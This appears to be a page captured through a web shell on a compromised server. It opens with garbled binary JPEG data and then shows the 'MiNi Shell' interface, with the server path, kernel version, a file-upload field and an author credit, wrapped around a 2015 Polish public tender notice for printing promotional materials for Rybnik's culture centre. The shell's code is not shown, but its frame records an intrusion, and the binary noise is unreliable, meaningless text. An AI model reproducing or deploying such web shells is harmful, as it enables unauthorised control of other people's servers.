JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150123/16818-N-2015.html

<p class="kh_header"><b>Rybnik: Zadanie1: druk i dostawa materiałów reklamowych typu: repertuary, plakaty, ulotki, wizytówki
Zadanie 2: druk i dostawa banerów reklamowych</b><br>
<b>Numer ogłoszenia: 16818 - 2015; data zamieszczenia: 23.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rybnickie Centrum Kultury , Plac Teatralny 1, 44-200 Rybnik, woj. śląskie, tel. 32 4222132, 4223235, faks 32 42 22132 wew. 110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rck.rybnik.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie1: druk i dostawa materiałów reklamowych typu: repertuary, plakaty, ulotki, wizytówki
Zadanie 2: druk i dostawa banerów reklamowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie1: druk i dostawa materiałów reklamowych typu: 
	      repertuary, plakaty, ulotki, wizytówki
1.	Usługa druku i dostawy materiałów reklamowych Rybnickiego Centrum Kultury wg      poniższych wymagań:

-13 wydań programów repertuarowych 
nakład: 3 tysiące egzemplarzy jednego wydania programu repertuarowego-format: 400x210 mm.
papier: kreda mat 150 g.,
kolor: obustronny, falcowany na cztery

- 20 wydań plakatów
nakład:100 sztuk jednego wydania plakatu
zadruk 4/0
papier: kreda błysk 150 g
format: B1
-	15 wydań ulotek informacyjnych 
nakład: 100 sztuk jednego wydania ulotki
format: A4 bigowane ( 2 bigi)
papier: kreda mat 250 g.,
kolor: pełny kolor dwustronnie
-	ulotki informacyjne 
nakład: 5000 sztuk 
format: A4 bigowane ( 2 bigi)
papier ozdobny: Constellation Ivony E06 Tela 240g
kolor: pełny kolor dwustronnie
trzy nacięcia na wkładki w środkowej części ulotki
-	ulotki informacyjne 
nakład: 5000 sztuk 
format: A6
papier: ozdobny: Constellation Ivony E06 Tela 240g.,
zadruk 4/4 cmyk,
introligatorka: cięcie na użytki
-	wizytówki 1000 sztuk- 2 wzory

Zamawiający informuje Wykonawcę o terminie druku w.w. przedmiotu zamówienia na 2 dni przed dostarczeniem materiałów.
Zamawiający przygotowuje skład druku w programie Corell Draw X4 a zdjęcia przygotowane w formacie tiff i dostarcza materiał do druku drogą internetową na adres wskazany przez Wykonawcę.
Do obowiązków Wykonawcy należy ostateczna korekta jakości zdjęć i przygotowanie materiału do dalszego procesu druku, w zależności od technologii stosowanej w drukarni.
Czas druku przedmiotu zamówienia, o którym mowa, będzie liczony od momentu złożenia zamówienia na druk przez Zamawiającego do momentu dostarczenia gotowego zamówienia do siedziby Zamawiającego, nie dłużej niż 5 dni roboczych. 
Niedotrzymanie w/w terminu rodzi uprawnienie po stronie Zamawiającego do zastosowania kar umownych a w przypadku powtórzenia niedotrzymania terminu do natychmiastowego rozwiązania umowy.
Wykonawca ma obowiązek dostarczenia na swój koszt zamówienia do siedziby Zamawiającego.
Fakturowanie odbywać się będzie częściowo po wydrukowaniu każdego nakładu. 
Do wyliczenia ceny ofertowej należy przyjąć specyfikację wydruku w tabeli określonej w załączniku nr 1.
Zamawiający zastrzega sobie możliwość niepełnej realizacji zamówienia.

Zadanie 2: druk i dostawa banerów reklamowych
Druk i dostawa banerów reklamowych Rybnickiego Centrum Kultury wg poniższych wymagań:

Druk na banerach frontlit pro + zgrzewanie i oczkowanie 
Nakład: 60 szt
Format: 2,35 m  na 1,30 m
Nadruk: jednostronny
Kolor: pełny
Grubość: 510 gram na 1m 2

-Zamawiający informuje Wykonawcę o terminie druku poszczególnych banerów na 2 dni przed dostarczeniem materiałów.
-Zamawiający dostarcza materiały w formacie PDF lub w programie Corel DrawX4 do druku drogą internetową na adres wskazany przez Wykonawcę.
-Do obowiązków Wykonawcy należy przygotowanie materiałów dostarczonych przez Zamawiającego do dalszego procesu druku, w zależności od technologii stosowanej w drukarni.
-Czas druku dostarczonych materiałów przez Zamawiającego nie może być dłuższy niż 5 dni roboczych. Czas ten będzie liczony od momentu odbioru całości materiałów przez Wykonawcę do momentu dostarczenia gotowego baneru(ów) do siedziby Zamawiającego.
-Niedotrzymanie w/w terminu rodzi uprawnienie po stronie Zamawiającego do zastosowania kar umownych a w przypadku powtórzenia niedotrzymania terminu do natychmiastowego rozwiązania umowy.
-Wykonawca ma obowiązek dostarczenia na swój koszt zamówienia do siedziby Zamawiającego.
-Fakturowanie odbywać się będzie częściowo po wydrukowaniu banerów bądź baneru z ogólnej puli 60 sztuk.
-Do wyliczenia ceny ofertowej należy przyjąć specyfikację wydruku w tabeli określonej w załączniku nr 1
-Zamawiający zastrzega sobie możliwość niepełnej realizacji zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20% wartości zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-Formularz ofertowy załącznik 1.1. lub i załącznik 1.2.
-Oświadczenia i dokumenty opisane w rozdz. V SIWZ
-Pełnomocnictwo do podpisania oferty lub do podpisania innych dokumentów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas druku i dostawy gotowego materiału - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w zakresie wynagrodzenia na podstawie art. 142  u.5 ustawy Prawo zamówień publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rck.rybnik.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rybnickie Centrum Kultury Plac Teatralny 1, 44-200 Rybnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2015 godzina 09:00, miejsce: Rybnickie Centrum Kultury Plac Teatralny 1, 44-200 Rybnik,
sekretariat, I piętro pok.221 (godziny urzędowania 7:15 do 15:15).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com